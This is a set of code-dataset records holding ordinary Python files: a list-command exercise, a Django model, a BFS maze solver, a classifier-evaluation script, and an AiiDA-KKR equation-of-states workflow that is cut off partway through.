{"seq_id":"171073601","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 15 10:31:21 2019\r\n\r\n@author: swang\r\n\r\nConsider a list (list = []). You can perform the following commands:\r\n\r\ninsert i e: Insert integer e at position i.\r\nprint: Print the list.\r\nremove e: Delete the first occurrence of integer e.\r\nappend e: Insert integer e at the end of the list.\r\nsort: Sort the list.\r\npop: Pop the last element from the list.\r\nreverse: Reverse the list.\r\nInitialize your list and read in the value of n followed by n lines of commands where each command will be of the types listed above. \r\nIterate through each command in order and perform the corresponding operation on your list.\r\n\r\nInput Format:\r\nThe first line contains an integer, n, denoting the number of commands. \r\nEach line of the n subsequent lines contains one of the commands described above.\r\n\r\nConstraints:\r\nThe elements added to the list must be integers.\r\nOutput Format\r\n\r\nFor each command of type print, print the list on a new line.\r\n\"\"\"\r\n\r\n# Enter the number of lines\r\nif __name__ == '__main__':\r\n    N = int(input())\r\n\r\n# Make a new list\r\nmyList=[]\r\n\r\n# For each line do the following:\r\nfor row in range(N):\r\n    # split the line into a new list \"line\" and extract the information depending on the length\r\n    # command is always at [0]\r\n    line=input().split()\r\n    if len(line)==1:\r\n        command=line[0]\r\n    elif len(line)==2:\r\n        command=line[0]\r\n        e=int(line[1])\r\n    elif len(line)==3:\r\n        command=line[0]\r\n        i=int(line[1])\r\n        e=int(line[2])\r\n\r\n    # based on each command, do the corresponding thing\r\n    if command=='insert':\r\n        myList.insert(i,e)\r\n    elif command=='print':\r\n        print(myList)\r\n    elif command=='remove':\r\n        myList.remove(e)\r\n    elif command=='append':\r\n        myList.append(e)\r\n    elif command=='sort':\r\n        myList.sort()\r\n    elif command=='pop':\r\n        myList.pop()\r\n    elif command=='reverse':\r\n        myList.reverse()\r\n","sub_path":"Python/ListCommand.py","file_name":"ListCommand.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"91508445","text":"from django.db import models\n# from django.contrib.auth.models import User\n\n# Create your models here.\nclass Terminal(models.Model):\n\n    CONNECTION_STATUS = (('Connected', 'Connected'),\n                         ('Ready', 'Ready'))\n\n    id = models.AutoField(primary_key=True)\n\n    event = models.ForeignKey( 'event.Event',\n                               null=True,\n                               on_delete=models.SET_NULL,\n                               default='')\n\n    status = models.CharField( max_length=30,\n                               choices=CONNECTION_STATUS,\n                               default='Connected',\n                               null=False,\n                               blank=False)\n\n    address = models.CharField( max_length=30,\n                                null=False,\n                                blank=False,\n                                unique=True)\n    class Meta:\n        ordering = [\"id\"]\n\n    def __str__(self):\n        \"\"\"\n        String
for representing the Model object (in Admin site etc.)\n        \"\"\"\n        return self.address\n","sub_path":"eHall/api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"146490390","text":"from collections import deque\n\n# Maze escape\n\n# read N and M, separated by whitespace\nn,m = map(int, input().split())\n\ngraph = []\nfor _ in range(n):\n    graph.append(list(map(int, input())))\n\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\n\ndef bfs (x,y):\n    queue = deque()\n    queue.append((x,y))\n\n    while queue:\n        x, y = queue.popleft()\n\n        for i in range(4):\n            vx = x + dx[i]\n            vy = y + dy[i]\n            \n            if (vx < 0 or vx >= n or vy < 0 or vy >= m) :\n                continue\n            if graph[vx][vy] == 0:\n                continue\n            if graph[vx][vy] == 1:\n                graph[vx][vy] = graph[x][y] + 1\n                queue.append((vx,vy))\n\n    return graph[n-1][m-1]\n\nprint(bfs(0,0))\n","sub_path":"textbook/bfs01.py","file_name":"bfs01.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"101239244","text":"import pandas as pd\nimport Classifiers as NN\nimport matplotlib.pyplot as plt\n\ndef get_dataset1():\n    \"\"\"Retrieve the kuwait dataset and process the data.\"\"\"\n    # Set defaults.\n    filename = \"Kuwait.xlsx\"\n    df = pd.read_excel(filename, 'DataSet2', header= 0, usecols=\"B:X\")\n    dm = pd.read_excel(filename, 'DataSet2', header= 0, usecols=\"AF\")\n    X = df.values\n    Y = dm.values\n    input_shape = 23\n    return X, Y, input_shape\n\n\ndef get_dataset2():\n    \"\"\"Retrieve the gcc dataset and process the data.\"\"\"\n    # Set defaults.\n    filename = \"FinancialData.xlsx\"\n    df = pd.read_excel(filename, 'DataSet2', header=0, usecols=\"B:R\")\n    dm = pd.read_excel(filename, 'DataSet2', header=0, usecols=\"Y\")\n    X = df.values\n    Y = dm.values\n    input_shape = 17\n    return X, Y, input_shape\n\n\nX, Y, Input_shape = get_dataset1()\nD1_MV_accuracy, D1_MV_f1score = NN.Accuracy_MV(X, Y)\nprint(\"MV Dataset1: \", D1_MV_accuracy, D1_MV_f1score)\nD1_RF_accuracy, D1_RF_f1score = NN.Accuracy_RF(X, Y)\nprint(\"RF Dataset1: \", D1_RF_accuracy, D1_RF_f1score)\nD1_ADA_accuracy, D1_ADA_f1score = NN.Accuracy_Adaboost(X, Y)\nprint(\"Adaboost Dataset1: \", D1_ADA_accuracy, D1_ADA_f1score)\nD1_DT_accuracy, D1_DT_f1score = NN.Accuracy_DT(X, Y)\nprint(\"DT Dataset1: \", D1_DT_accuracy, D1_DT_f1score)\nD1_SVM_accuracy, D1_SVM_f1score = NN.Accuracy_SVM(X, Y)\nprint(\"SVM Dataset1: \", D1_SVM_accuracy, D1_SVM_f1score)\nD1_NN_accuracy, D1_NN_f1score = (NN.Accuracy_NN(X, Y))\nprint(\"NN Dataset1: \", D1_NN_accuracy, D1_NN_f1score)\n\nX, Y, Input_shape = get_dataset2()\nD2_MV_accuracy, D2_MV_f1score = NN.Accuracy_MV(X, Y)\nprint(\"MV Dataset2: \", D2_MV_accuracy, D2_MV_f1score)\nD2_RF_accuracy, D2_RF_f1score = NN.Accuracy_RF(X, Y)\nprint(\"RF Dataset2: \", D2_RF_accuracy, D2_RF_f1score)\nD2_ADA_accuracy, D2_ADA_f1score = NN.Accuracy_Adaboost(X, Y)\nprint(\"Adaboost Dataset2: \", D2_ADA_accuracy, D2_ADA_f1score)\nD2_DT_accuracy, D2_DT_f1score = NN.Accuracy_DT(X, Y)\nprint(\"DT Dataset2: \", D2_DT_accuracy, D2_DT_f1score)\nD2_SVM_accuracy, D2_SVM_f1score = NN.Accuracy_SVM(X, Y)\nprint(\"SVM Dataset2: \", D2_SVM_accuracy, D2_SVM_f1score)\nD2_NN_accuracy, D2_NN_f1score = NN.Accuracy_NN(X, Y)\nprint(\"NN Dataset2: \", D2_NN_accuracy, D2_NN_f1score)\n\ndataset = (\"Dataset1\", \"Dataset2\")\nmodels = (\"NN\", \"DT\", \"SVM\", \"MV\", \"RF\", \"Adaboost\")
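\n# keep the metric tuples in the same order as the models tuple so the plots and tables line up\nDataset1_Accuracy = (D1_NN_accuracy, D1_DT_accuracy, D1_SVM_accuracy, 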
D1_MV_accuracy, D1_RF_accuracy, D1_ADA_accuracy)\nDataset2_Accuracy = (D2_NN_accuracy, D2_DT_accuracy, D2_SVM_accuracy, D2_MV_accuracy, D2_RF_accuracy, D2_ADA_accuracy)\nDataset1_f1score = (D1_NN_f1score, D1_DT_f1score, D1_SVM_f1score, D1_MV_f1score, D1_RF_f1score, D1_ADA_f1score)\nDataset2_f1score = (D2_NN_f1score, D2_DT_f1score, D2_SVM_f1score, D2_MV_f1score, D2_RF_f1score, D2_ADA_f1score)\n\n\nfig, ax = plt.subplots()\nax.plot(models, Dataset1_Accuracy, color='r', marker='o', linestyle='--', markersize=5, label='Dataset1')\nax.plot(models, Dataset2_Accuracy, color='b', marker='o', linestyle='--', markersize=5, label=\"DataSet2\")\n\nlegend = ax.legend(loc='lower right', shadow=True)\n\ndata = [[format(D1_NN_accuracy, '.2f'), format(D2_NN_accuracy, '.2f')], [format(D1_DT_accuracy, '.2f'), format(D2_DT_accuracy, '.2f')], [format(D1_SVM_accuracy, '.2f'), format(D2_SVM_accuracy, '.2f')], [format(D1_MV_accuracy, '.2f'), format(D2_MV_accuracy, '.2f')],[format(D1_RF_accuracy, '.2f'), format(D2_RF_accuracy, '.2f')], [format(D1_ADA_accuracy, '.2f'), format(D2_ADA_accuracy, '.2f')]]\nprint(\"\\033[33m\\nAccuracy Table(Classification\\Train:Test Ratio)\\n\", pd.DataFrame(data, models, dataset))\n\nplt.ylim([20,100])\nplt.xlabel(\"Classifier Model\")\nplt.ylabel(\"Mean Accuracy\")\nplt.title(\"Accuracy of Machine Learning Classifiers on FDP\")\nplt.show()\n\nfig, ax = plt.subplots()\nax.plot(models, Dataset1_f1score, color='r', marker='o', linestyle='--', markersize=5, label='Dataset1')\nax.plot(models, Dataset2_f1score, color='b', marker='o', linestyle='--', markersize=5, label=\"DataSet2\")\n\nlegend = ax.legend(loc='lower right', shadow=True)\n\ndata = [[format(D1_NN_f1score, '.2f'), format(D2_NN_f1score, '.2f')], [format(D1_DT_f1score, '.2f'), format(D2_DT_f1score, '.2f')], [format(D1_SVM_f1score, '.2f'), format(D2_SVM_f1score, '.2f')], [format(D1_MV_f1score, '.2f'), format(D2_MV_f1score, '.2f')],[format(D1_RF_f1score, '.2f'), format(D2_RF_f1score, '.2f')], [format(D1_ADA_f1score, '.2f'), format(D2_ADA_f1score, '.2f')]]\nprint(\"\\033[33m\\nAccuracy Table(Classification\\Train:Test Ratio)\\n\", pd.DataFrame(data, models, dataset))\n\nplt.ylim([20,100])\nplt.xlabel(\"Classifier Model\")\nplt.ylabel(\"Mean F1-score\")\nplt.title(\"F1-Score of Machine Learning Classifiers on FDP\")\nplt.show()\n\n","sub_path":"Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346088224","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nIn this module you find the base workflow for a EOS calculation and\nsome helper methods to do so with AiiDA\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom aiida.orm import Code, load_node\nfrom aiida.plugins import DataFactory\nfrom aiida.orm import Float, Bool\nfrom aiida.engine import WorkChain, ToContext\nfrom aiida.engine import calcfunction\nfrom aiida_kkr.calculations.kkr import KkrCalculation\nfrom aiida_kkr.calculations.voro import VoronoiCalculation\nfrom aiida_kkr.tools.common_workfunctions import update_params_wf\nfrom aiida_kkr.workflows.voro_start import kkr_startpot_wc\nfrom aiida_kkr.workflows.kkr_scf import kkr_scf_wc\nfrom masci_tools.io.kkr_params import kkrparams\nfrom masci_tools.io.common_functions import get_Ry2eV\nfrom ase.eos import EquationOfState\nfrom numpy import array, mean, std, min, sort\nfrom six.moves import 
range\n\n\n__copyright__ = (u\"Copyright (c), 2018, Forschungszentrum Jülich GmbH, \"\n \"IAS-1/PGI-1, Germany. All rights reserved.\")\n__license__ = \"MIT license, see LICENSE.txt file\"\n__version__ = \"0.8.1\"\n__contributors__ = u\"Philipp Rüßmann\"\n\n\nRemoteData = DataFactory('remote')\nStructureData = DataFactory('structure')\nDict = DataFactory('dict')\n\nclass kkr_eos_wc(WorkChain):\n \"\"\"\n Workchain of an equation of states calculation with KKR.\n\n Layout of the workflow:\n 1. determine V0, scale_range, etc. from input\n 2. run voro_start for V0 and smallest volume\n 2.1 get minimum for RMTCORE (needs to be fixed for all calculations to be able to compare total energies\n 3. submit kkr_scf calculations for all volumes using RMTCORE setting determined in step 2\n 4. collect results\n \"\"\"\n\n _workflowversion = __version__\n _wf_label = 'kkr_eos_wc_{}' # replace with structure formula\n _wf_description = 'Equation of states workflow for {} using KKR' # replace with structure formula\n # workflow options (computer settings)\n _options_default = {'queue_name' : '', # Queue name to submit jobs too\n 'resources': {\"num_machines\": 1}, # resources to allocate for the job\n 'max_wallclock_seconds' : 60*60, # walltime in seconds after which the job gets killed (gets parsed to KKR)\n 'use_mpi' : True, # execute KKR with mpi or without\n 'custom_scheduler_commands' : '' # some additional scheduler commands (e.g. project numbers in job scripts, OpenMP settings, ...)\n }\n # workflow settings\n _wf_default = {'scale_range' : [0.94, 1.06], # range around volume of starting structure which eos is computed\n 'nsteps': 7, # number of calculations around\n 'ground_state_structure': True, # create and return a structure which has the ground state volume determined by the fit used\n 'use_primitive_structure': True, # use seekpath to get primitive structure after scaling to reduce computational time\n 'fitfunction': 'birchmurnaghan', # fitfunction used to determine ground state volume (see ase.eos.EquationOfState class for details)\n 'settings_kkr_startpot': kkr_startpot_wc.get_wf_defaults(silent=True), # settings for kkr_startpot behavior\n 'settings_kkr_scf': kkr_scf_wc.get_wf_defaults(silent=True) # settings for kkr_scf behavior\n }\n # change _wf_default of kkr_scf to deactivate DOS runs\n _wf_default['settings_kkr_scf']['check_dos'] = False\n\n @classmethod\n def get_wf_defaults(self, silent=False):\n \"\"\"\n Print and return _wf_defaults dictionary. 
Can be used to easily create set of wf_parameters.\n returns _wf_defaults, _options_default\n \"\"\"\n if not silent: print('Version of workflow: {}'.format(self._workflowversion))\n return self._wf_default, self._options_default\n\n\n @classmethod\n def define(cls, spec):\n \"\"\"\n Defines the outline of the workflow.\n \"\"\"\n # Take input of the workflow or use defaults defined above\n super(kkr_eos_wc, cls).define(spec)\n spec.input(\"options\", valid_type=Dict, required=False, # computer options\n default=Dict(dict=cls._options_default))\n spec.input(\"wf_parameters\", valid_type=Dict, required=False, # workfunction settings\n default=Dict(dict=cls._wf_default))\n spec.input(\"kkr\", valid_type=Code, required=True) # KKRhost code\n spec.input(\"voronoi\", valid_type=Code, required=True) # voronoi code\n spec.input(\"structure\", valid_type=StructureData, required=True) # starting structure node\n spec.input(\"calc_parameters\", valid_type=Dict, required=False) # KKR input parameters (lmax etc.)\n\n # define output nodes\n spec.output(\"eos_results\", valid_type=Dict, required=True)\n spec.output(\"gs_structure\", valid_type=StructureData, required=False)\n spec.output(\"explicit_kpoints\", required=False)\n spec.output(\"get_explicit_kpoints_path_parameters\", valid_type=Dict, required=False)\n\n # Here the structure of the workflow is defined\n spec.outline(\n # 1. initialize workflow and check input consistency\n cls.start,\n # 2. prepare structures\n cls.prepare_strucs,\n # 3. run voronoi calculation for smallest volume0\n cls.run_vorostart,\n # 4. check voronoi output and extract RMTCORE parameter\n cls.check_voro_out,\n # 5. submit KKR calculations for all steps\n cls.run_kkr_steps,\n # 6. collect output and fit results\n cls.collect_data_and_fit,\n # 7. collect and return output nodes\n cls.return_results\n )\n\n # ToDo: improve error codes\n spec.exit_code(221, 'ERROR_INVALID_INPUT',\n message=\"ERROR: inputs invalid\")\n spec.exit_code(222, 'ERROR_NOT_ENOUGH_SUCCESSFUL_CALCS',\n message='ERROR: need at least 3 successful calculations')\n spec.exit_code(223, 'ERROR_NSTEPS_TOO_SMALL',\n message='ERROR: nsteps is smaller than 3, need at least three data points to do fitting')\n spec.exit_code(224, 'ERROR_INVALID_FITFUN',\n message='given fitfunction name not valid')\n spec.exit_code(225, 'ERROR_VOROSTART_NOT_SUCCESSFUL',\n message='ERROR: kkr_startpot was not successful. 
Check your inputs.')\n\n\n    def start(self):\n        \"\"\"\n        initialize context and check input nodes\n        \"\"\"\n\n        self.report('INFO: starting KKR eos workflow version {}'.format(self._workflowversion))\n\n        # now extract information from input nodes\n        try:\n            self.ctx.wf_options = self.inputs.get('options').get_dict()\n            self.ctx.wf_parameters = self.inputs.get('wf_parameters').get_dict()\n            self.ctx.kkr = self.inputs.get('kkr') #TODO: check if code is KKR code\n            self.ctx.voro = self.inputs.get('voronoi') #TODO: check if code is voronoi code\n            self.ctx.structure = self.inputs.get('structure')\n            self.ctx.calc_parameters = self.inputs.get('calc_parameters') # optional, TODO: needs to be filled with defaults if not present\n        except:\n            # in case of failure, exit workflow here\n            return self.exit_codes.ERROR_INVALID_INPUT\n\n        # add label and description if not given (contains structure name)\n        #if self.label is None:\n        self.ctx.label = self._wf_label.format(self.ctx.structure.get_formula())\n        #if self.description is None:\n        self.ctx.description = self._wf_description.format(self.ctx.structure.get_formula())\n        if self.ctx.wf_parameters['settings_kkr_startpot'].get('_label', None) is None:\n            self.ctx.wf_parameters['settings_kkr_startpot']['_label'] = self.ctx.label+'_kkr_startpot_{}'.format(self.ctx.structure.get_formula())\n        if self.ctx.wf_parameters['settings_kkr_startpot'].get('_description', None) is None:\n            self.ctx.wf_parameters['settings_kkr_startpot']['_description'] = self.ctx.description+' kkr_startpot step for {}'.format(self.ctx.structure.get_formula())\n        if self.ctx.wf_parameters['settings_kkr_scf'].get('label', None) is None:\n            self.ctx.wf_parameters['settings_kkr_scf']['label'] = self.ctx.label+'_kkr_scf_{}'.format(self.ctx.structure.get_formula())\n        if self.ctx.wf_parameters['settings_kkr_scf'].get('description', None) is None:\n            self.ctx.wf_parameters['settings_kkr_scf']['description'] = self.ctx.description+' kkr_scf step for {}'.format(self.ctx.structure.get_formula())\n\n        # initialize some other things used to collect results etc.\n        self.ctx.successful = True\n        self.ctx.warnings = []\n        self.ctx.rms_threshold = self.ctx.wf_parameters['settings_kkr_scf'].get('convergence_criterion', 10**-7)\n        self.ctx.nsteps = self.ctx.wf_parameters.get('nsteps')\n        self.ctx.scale_range = self.ctx.wf_parameters.get('scale_range')\n        self.ctx.fitfunc_gs_out = self.ctx.wf_parameters.get('fitfunction') # fitfunction used to get ground state structure\n        self.ctx.return_gs_struc = self.ctx.wf_parameters.get('ground_state_structure') # boolean, return output structure or not\n        self.ctx.use_primitive_structure = self.ctx.wf_parameters.get('use_primitive_structure')\n        self.ctx.scaled_structures = [] # filled in prepare_strucs\n        self.ctx.fitnames = ['sj', 'taylor', 'murnaghan', 'birch', 'birchmurnaghan', 'pouriertarantola', 'vinet', 'antonschmidt', 'p3'] # list of allowed fits\n        self.ctx.sub_wf_ids = {} # filled with workflow uuids\n\n        # check input (return the exit code so the workflow actually aborts)\n        if self.ctx.nsteps<3:\n            return self.exit_codes.ERROR_NSTEPS_TOO_SMALL\n        if self.ctx.fitfunc_gs_out not in self.ctx.fitnames:\n            return self.exit_codes.ERROR_INVALID_FITFUN\n\n        # set scale_factors from scale_range and nsteps\n        self.ctx.scale_factors = []\n        for i in range(self.ctx.nsteps):\n            scale_fac = self.ctx.scale_range[0]+i*(self.ctx.scale_range[1]-self.ctx.scale_range[0])/(self.ctx.nsteps-1)\n            self.ctx.scale_factors.append(scale_fac)\n\n\n    def prepare_strucs(self):\n        \"\"\"\n        create new set of scaled structures using the 'rescale' workfunction (see end of the workflow)\n        \"\"\"
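\n        # e.g. scale_range=[0.94, 1.06] with nsteps=7 gives factors 0.94, 0.96, ..., 1.06 (set in start)\n        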
for scale_fac in self.ctx.scale_factors:\n            scaled_structure = rescale(self.ctx.structure, Float(scale_fac))\n            if self.ctx.use_primitive_structure:\n                scaled_structure = get_primitive_structure(scaled_structure, Bool(False))\n            self.ctx.scaled_structures.append(scaled_structure)\n\n\n    def run_vorostart(self):\n        \"\"\"\n        run vorostart workflow for smallest structure to determine rmtcore setting for all others\n        \"\"\"\n        wfd = kkr_startpot_wc.get_wf_defaults(silent=True)\n        set_keys = []\n        # first set options\n        for key in list(self.ctx.wf_options.keys()):\n            wfd[key] = self.ctx.wf_options.get(key)\n            set_keys.append(key)\n        # then set ef_settings\n        vorostart_settings = self.ctx.wf_parameters.get('settings_kkr_startpot')\n        for key in list(vorostart_settings.keys()):\n            if key not in set_keys: # skip setting of options (done above already)\n                wfd[key] = vorostart_settings[key]\n        scaled_struc = self.ctx.scaled_structures[0]\n        future = self.submit(kkr_startpot_wc, structure=scaled_struc, kkr=self.ctx.kkr,\n                             voronoi=self.ctx.voro, wf_parameters=Dict(dict=wfd),\n                             calc_parameters=self.ctx.calc_parameters,\n                             options=Dict(dict=self.ctx.wf_options))\n\n        self.report('INFO: running kkr_startpot workflow (pk= {})'.format(future.pk))\n        self.ctx.sub_wf_ids['kkr_startpot_1'] = future.uuid\n\n        return ToContext(kkr_startpot=future)\n\n\n    def check_voro_out(self):\n        \"\"\"\n        check output of vorostart workflow and create input for rest of calculations (rmtcore setting etc.)\n        \"\"\"\n        self.report('INFO: checking voronoi output')\n        # get output of kkr_startpot\n        out_wc = self.ctx.kkr_startpot\n        try:\n            res = out_wc.outputs.results_vorostart_wc\n            voro_params = out_wc.outputs.last_params_voronoi\n            smallest_voro_remote = out_wc.outputs.last_voronoi_remote\n            smallest_voro_results = out_wc.outputs.last_voronoi_results\n            vorostart_success = res.get_dict()['successful']\n        except:\n            vorostart_success = False\n\n        if vorostart_success:\n            rmt = []\n            radii = smallest_voro_results.get_dict()['radii_atoms_group']\n            for rad_iatom in radii:\n                if 'rmt0' in list(rad_iatom.keys()):\n                    rmt.append(rad_iatom['rmt0'])\n            rmtcore_min = array(rmt) * smallest_voro_results.get_dict().get('alat') # needs to be multiplied by alat in atomic units!\n            self.report('INFO: extracted rmtcore_min ({})'.format(rmtcore_min))\n        else:\n            return self.exit_codes.ERROR_VOROSTART_NOT_SUCCESSFUL\n\n        # update parameter node with rmtcore setting\n        voro_params_with_rmtcore = kkrparams(**voro_params.get_dict())\n        voro_params_with_rmtcore.set_value('<RMTCORE>', rmtcore_min)\n        voro_params_with_rmtcore_dict = voro_params_with_rmtcore.get_dict()\n        voro_params_with_rmtcore = update_params_wf(voro_params, Dict(dict=voro_params_with_rmtcore_dict))\n        self.report('INFO: updated kkr_parameters including RMTCORE setting (uuid={})'.format(voro_params_with_rmtcore.uuid))\n\n        # store links to context\n        self.ctx.params_kkr_run=voro_params_with_rmtcore\n        self.ctx.smallest_voro_remote=smallest_voro_remote\n\n\n    def run_kkr_steps(self):\n        \"\"\"\n        submit KKR calculations for all structures, skip vorostart step for smallest structure\n        \"\"\"\n\n        self.report('INFO: running kkr scf steps')\n        # params for scf wfd\n        wfd = kkr_scf_wc.get_wf_defaults(silent=True)\n        set_keys = []\n        # first set options\n        for key in list(self.ctx.wf_options.keys()):\n            wfd[key] = self.ctx.wf_options.get(key)\n            set_keys.append(key)\n        # then set ef_settings\n        kkr_scf_settings = self.ctx.wf_parameters.get('settings_kkr_scf')\n        for key in list(kkr_scf_settings.keys()):\n            if key not in set_keys: # skip setting of options (done above
already)\n wfd[key] = kkr_scf_settings[key]\n\n # used to collect all submitted calculations\n calcs = {}\n\n # submit first calculation separately\n self.report('submit calc for scale fac= {} on {}'.format(self.ctx.scale_factors[0], self.ctx.scaled_structures[0].get_formula()))\n future = self.submit(kkr_scf_wc, kkr=self.ctx.kkr, remote_data=self.ctx.smallest_voro_remote,\n wf_parameters=Dict(dict=wfd), calc_parameters=self.ctx.params_kkr_run,\n options=Dict(dict=self.ctx.wf_options))\n scale_fac = self.ctx.scale_factors[0]\n calcs['kkr_{}_{}'.format(1, scale_fac)] = future\n self.ctx.sub_wf_ids['kkr_scf_1'] = future.uuid\n\n # then also submit the rest of the calculations\n for i in range(len(self.ctx.scale_factors)-1):\n scale_fac = self.ctx.scale_factors[i+1]\n scaled_struc = self.ctx.scaled_structures[i+1]\n self.report('submit calc for scale fac= {} on {}'.format(scale_fac, scaled_struc.get_formula()))\n future = self.submit(kkr_scf_wc, structure=scaled_struc, kkr=self.ctx.kkr, voronoi=self.ctx.voro,\n wf_parameters=Dict(dict=wfd), calc_parameters=self.ctx.params_kkr_run,\n options=Dict(dict=self.ctx.wf_options))\n calcs['kkr_{}_{}'.format(i+2, scale_fac)] = future\n self.ctx.sub_wf_ids['kkr_scf_{}'.format(i+2)] = future.uuid\n\n # save uuids of calculations to context\n self.ctx.kkr_calc_uuids = []\n for name in sort(list(calcs.keys())): # sorting important to have correct assignment of scaling and structure info later on\n calc = calcs[name]\n self.ctx.kkr_calc_uuids.append(calc.uuid)\n\n self.report('INFO: submitted calculations: {}'.format(calcs))\n\n return ToContext(**calcs)\n\n\n def collect_data_and_fit(self):\n \"\"\"\n collect output of KKR calculations and perform eos fitting to collect results\n \"\"\"\n self.report('INFO: collect kkr results and fit data')\n calc_uuids = self.ctx.kkr_calc_uuids\n etot = []\n for iic in range(len(calc_uuids)):\n uuid = calc_uuids[iic]\n n = load_node(uuid)\n try:\n d_result = n.outputs.output_kkr_scf_wc_ParameterResults.get_dict()\n self.report('INFO: extracting output of calculation {}: successful={}, rms={}'.format(uuid, d_result[u'successful'], d_result[u'convergence_value']))\n if d_result[u'successful']:\n pk_last_calc = d_result['last_calc_nodeinfo']['pk']\n n2 = load_node(pk_last_calc)\n scale = self.ctx.scale_factors[iic]\n ener = n2.outputs.output_parameters.get_dict()['total_energy_Ry']\n rms = d_result[u'convergence_value']\n scaled_struc = self.ctx.scaled_structures[iic]\n v = scaled_struc.get_cell_volume()\n if rms<=self.ctx.rms_threshold: # only take those calculations which\n etot.append([scale, ener, v, rms])\n else:\n warn = 'rms of calculation with uuid={} not low enough ({} > {})'.format(uuid, rms, self.ctx.rms_threshold)\n self.report('WARNING: {}'.format(warn))\n self.ctx.warnings.append(warn)\n except:\n warn = 'calculation with uuid={} not successful'.format(uuid)\n self.report('WARNING: {}'.format(warn))\n self.ctx.warnings.append(warn)\n\n\n # collect calculation outcome\n etot = array(etot)\n self.report('INFO: collected data from calculations= {}'.format(etot))\n\n # check if at least 3 points were successful (otherwise fit does not work)\n if len(etot)<3:\n return self.exit_codes.ERROR_NOT_ENOUGH_SUCCESSFUL_CALCS\n\n scalings = etot[:,0]\n rms = etot[:,-1]\n # convert to eV and per atom units\n etot = etot/len(scaled_struc.sites) # per atom values\n etot[:,1] = etot[:,1] * get_Ry2eV() # convert energy from Ry to eV\n volumes, energies = etot[:,2], etot[:,1]\n\n # do multiple fits to data\n self.report('INFO: 
output of fits:')\n        self.report('{:18} {:8} {:7} {:7}'.format('fitfunc', 'v0', 'e0', 'B'))\n        self.report('-----------------------------------------')\n        fitnames = self.ctx.fitnames\n        alldat = []\n        fitdata = {}\n        for fitfunc in fitnames:\n            try:\n                eos = EquationOfState(volumes, energies, eos=fitfunc)\n                v0, e0, B = eos.fit()\n                fitdata[fitfunc] = [v0, e0, B]\n                alldat.append([v0, e0, B])\n                self.report('{:16} {:8.3f} {:7.3f} {:7.3f}'.format(fitfunc, v0, e0, B))\n            except: # capture all errors and mark fit as unsuccessful\n                self.ctx.warnings.append('fit unsuccessful for {} function'.format(fitfunc))\n                if fitfunc == self.ctx.fitfunc_gs_out:\n                    self.ctx.successful = False\n        alldat = array(alldat)\n        self.report('-----------------------------------------')\n        self.report('{:16} {:8.3f} {:7.3f} {:7.3f}'.format('mean', mean(alldat[:,0]), mean(alldat[:,1]), mean(alldat[:,2])))\n        self.report('{:16} {:8.3f} {:7.3f} {:7.3f}'.format('std', std(alldat[:,0]), std(alldat[:,1]), std(alldat[:,2])))\n\n        # store results in context\n        self.ctx.volumes=volumes\n        self.ctx.energies=energies\n        self.ctx.scalings=scalings\n        self.ctx.rms = rms\n        self.ctx.fitdata=fitdata\n        self.ctx.fit_mean_values={'<v0>':mean(alldat[:,0]), '<e0>':mean(alldat[:,1]), '<B>':mean(alldat[:,2])}\n        self.ctx.fit_std_values={'s_v0':std(alldat[:,0]), 's_e0':std(alldat[:,1]), 's_B':std(alldat[:,2])}\n\n\n    def return_results(self):\n        \"\"\"\n        create output dictionary and run output node generation\n        \"\"\"\n        self.report('INFO: create output node')\n        outdict = {}\n        outdict['successful'] = self.ctx.successful\n        outdict['warnings'] = self.ctx.warnings\n        outdict['sub_workflow_uuids'] = self.ctx.sub_wf_ids\n        outdict['nsteps_input'] = self.ctx.nsteps\n        outdict['scale_range_input'] = self.ctx.scale_range\n        outdict['scale_factors_all'] = self.ctx.scale_factors\n        outdict['volumes'] = self.ctx.volumes\n        outdict['energies'] = self.ctx.energies\n        outdict['scalings'] = self.ctx.scalings\n        outdict['rms'] = self.ctx.rms\n        outdict['parameter_fits'] = self.ctx.fitdata\n        outdict['fits_mean'] = self.ctx.fit_mean_values\n        outdict['fits_std'] = self.ctx.fit_std_values\n        outdict['formula'] = self.ctx.structure.get_formula()\n        outdict['label'] = self.ctx.label\n        if self.ctx.successful and self.ctx.return_gs_struc:\n            # final result: scaling factor for equilibrium\n            v0, e0, B = self.ctx.fitdata.get(self.ctx.fitfunc_gs_out)\n            scale_fac0 = v0/self.ctx.structure.get_cell_volume()*len(self.ctx.structure.sites)\n            outdict['gs_scale_factor'] = scale_fac0\n            outdict['gs_fitfunction'] = self.ctx.fitfunc_gs_out\n            gs_structure = rescale(self.ctx.structure, Float(scale_fac0))\n            if self.ctx.use_primitive_structure:\n                tmpdict = get_primitive_structure(gs_structure, Bool(True))\n                conv_structure, explicit_kpoints, parameters, gs_structure = tmpdict['conv_structure'], tmpdict['explicit_kpoints'], tmpdict['parameters'], tmpdict['primitive_structure']\n                outdict['gs_kpoints_seekpath_params_uuid'] = parameters.uuid\n            gs_structure.label = 'ground_state_structure_{}'.format(gs_structure.get_formula())
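\n            # a short description makes the returned node self-explanatory in the provenance graph\n            gs_structure.description = 'Ground state structure of {} after running eos workflow. 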
